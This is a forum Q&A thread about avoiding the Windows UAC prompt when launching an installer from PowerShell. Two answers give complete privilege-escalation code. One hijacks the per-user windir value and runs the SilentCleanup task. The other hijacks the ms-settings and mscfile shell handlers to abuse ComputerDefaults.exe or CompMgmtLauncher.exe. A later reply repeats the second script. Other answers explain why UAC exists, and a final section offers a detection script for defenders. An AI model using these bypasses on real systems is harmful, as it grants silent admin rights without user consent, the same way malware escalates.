I'm attempting to install an EXE using PowerShell with the following code:
Start-Process -FilePath "C:\Windows\Temp\Installer.exe" -Verb runas
I'm getting the User Account Control pop up that says "Do you want to allow the following program to make changes to this computer?" I would rather not disable UAC. Are there any methods to programmatically say "Yes" to the UAC prompt or to get around it?
Disabling UAC edits a key in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and thus requires write access to HKLM. In other words, disabling UAC requires admin rights, which defeats the point of your question.
Windows has a built-in AutoElevate backdoor. You can use this to launch other executables.
- An obvious approach is Task Scheduler. However, it's not the only approach.
- Likewise, any Windows executable that can auto-elevate can be used to spawn a high integrity process without UAC.
- This can be done programmatically below:
AlwaysNotify: (8.1 & after)
$regPath = "HKCU:\Environment"
$installer = "C:\Windows\Temp\Installer.exe" # change it yourself
Set-ItemProperty -Path $regPath -Name "windir" -Value "$installer && REM " -Force
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Start-Sleep -s 5 # Depending on the machine, some extra time may be required
Remove-ItemProperty -Path $regPath -Name "windir" -Force
Default:
function Bypass-UAC {
    [CmdletBinding()]
    param([string]$key, [string]$exploit)
    $regPath = "HKCU:\Software\Classes\$key\shell\open\command"
    $installer = "C:\Windows\Temp\Installer.exe" # change it yourself
    New-Item $regPath -Force
    New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force
    Set-ItemProperty $regPath -Name "(default)" -Value $installer -Force
    Start-Process $exploit
    Start-Sleep -s 5 # Depending on the machine, some extra time may be required
    Remove-Item $regPath -Force -Recurse
}
$ver = [System.Environment]::OSVersion.Version.Major # Get Windows version
if ($ver -eq 10) {
    Bypass-UAC ms-settings ComputerDefaults.exe
} else {
    Bypass-UAC mscfile CompMgmtLauncher.exe
}
NeverNotify / Disabled:
Start-Process "C:\Windows\Temp\Installer.exe" -Verb runas
$installer to the path of your quickassist.exe –
Highbinder You are using runas, thus forcing a prompt to supply credentials in order to continue.
Sooo, there's that, or are you saying, wherever the script is being run, the user is already logged on as admin? If that is the case, why elevate at all?
Thus ending up doing as Backin points out:
# Check UACState
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
Though disabling UAC is not recommended by MS and many others, though we know folks will anyway, for whatever reasoning they can justify it with.
Resources:
elevate without prompt - verb runas start-process
https://superuser.com/questions/195689/how-to-start-process-without-uac
https://gallery.technet.microsoft.com/scriptcenter/How-to-easily-run-an-0c0eb47a
The direct answer to your question:
Are there any methods to programmatically say "Yes" to the UAC prompt or to get around it?
...is "no." The reason is that this would be a huge security hole. Imagine if this were possible: All malware would have to do is use this bypass technique.
UAC is specifically designed to prevent you from doing what you are asking. While it is possible to disable UAC, it is definitely not recommended.
Aaron Margosis (Microsoft) wrote a blog post about this a while back:
FAQ: Why can't I bypass the UAC prompt?
A quote from that blog:
If it were possible to mark an application to run with silently-elevated privileges, what would become of all those apps out there with LUA [limited user access] bugs? Answer: they'd all be marked to silently elevate. How would future software for Windows be written? Answer: To silently elevate. Nobody would actually fix their apps, and end-user applications will continue to require and run with full administrative permissions unnecessarily.
I used ps2exe to generate my .exe from a .ps1 script. Using HaxAddict1337's Default code resulted in my .exe running but immediately closing.
I got it to work after adding a Start-Sleep -s 10 right before the Start-Process:
#this is used to run an .exe as Administrator without the "Are you sure?" UAC prompt
function Bypass-UAC {
    [CmdletBinding()]
    param([string]$key, [string]$exploit)
    $regPath = "HKCU:\Software\Classes\$key\shell\open\command"
    $installer = "C:\Windows\Temp\myProgram.exe" # change it yourself
    New-Item $regPath -Force
    New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force
    Set-ItemProperty $regPath -Name "(default)" -Value $installer -Force
    Start-Sleep -s 10 # if it's not working, try increasing these values
    Start-Process $exploit
    Start-Sleep -s 5 # if it's not working, try increasing these values
    Remove-Item $regPath -Force -Recurse
}
$ver = [System.Environment]::OSVersion.Version.Major # Get Windows version
if ($ver -eq 10) {
    Bypass-UAC ms-settings ComputerDefaults.exe
} else {
    Bypass-UAC mscfile CompMgmtLauncher.exe
}
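For defenders, the scripts posted above leave short-lived per-user registry values behind: a `windir` value under HKCU:\Environment, and a `shell\open\command` key for `ms-settings` or `mscfile` under HKCU:\Software\Classes. The following is an added example, not code from any of the answers; the function name `Get-UacHijackArtifact` is hypothetical. It reports those values for the current user together with the machine's UAC policy settings.

```powershell
# Added defensive example, not code from the thread.
# Get-UacHijackArtifact is a hypothetical name chosen for this illustration.
function Get-UacHijackArtifact {
    [CmdletBinding()]
    param(
        # ProgIDs used by the scripts in the thread; extend the list as needed.
        [string[]]$ProgId = @('ms-settings', 'mscfile')
    )
    $findings = @()

    # 1. Per-user "windir" value, which the first script sets before it
    #    runs the SilentCleanup scheduled task.
    $envKey = 'HKCU:\Environment'
    $windir = (Get-ItemProperty -Path $envKey -Name 'windir' -ErrorAction SilentlyContinue).windir
    if ($null -ne $windir) {
        $findings += [pscustomobject]@{ Path = $envKey; Name = 'windir'; Value = $windir }
    }

    # 2. Per-user shell\open\command handlers (DelegateExecute / default value),
    #    which the second script creates before starting the auto-elevating binary.
    foreach ($id in $ProgId) {
        $cmdKey = "HKCU:\Software\Classes\$id\shell\open\command"
        if (-not (Test-Path -Path $cmdKey)) { continue }
        $key = Get-Item -Path $cmdKey
        foreach ($name in $key.GetValueNames()) {
            $findings += [pscustomobject]@{
                Path  = $cmdKey
                Name  = if ($name -eq '') { '(default)' } else { $name }
                Value = $key.GetValue($name)
            }
        }
    }
    $findings
}

# UAC policy state: the EnableLUA check quoted in the thread, plus the
# consent prompt level stored under the same key.
$policy = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
[pscustomobject]@{
    EnableLUA                  = $policy.EnableLUA
    ConsentPromptBehaviorAdmin = $policy.ConsentPromptBehaviorAdmin
} | Format-List

Get-UacHijackArtifact | Format-Table -AutoSize -Wrap
```

Both scripts delete what they wrote after a few seconds, so a point-in-time scan mostly catches interrupted runs; continuous registry auditing of these paths (for example Sysmon registry events) is the more reliable signal.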
Just write this command to bypass UAC, but I don't know how to give permission to say yes in a bat script: "powershell Start-Process cmd -Verb runAs"
LowRiskFileTypes to allow an exception to fully automate it. – Effortless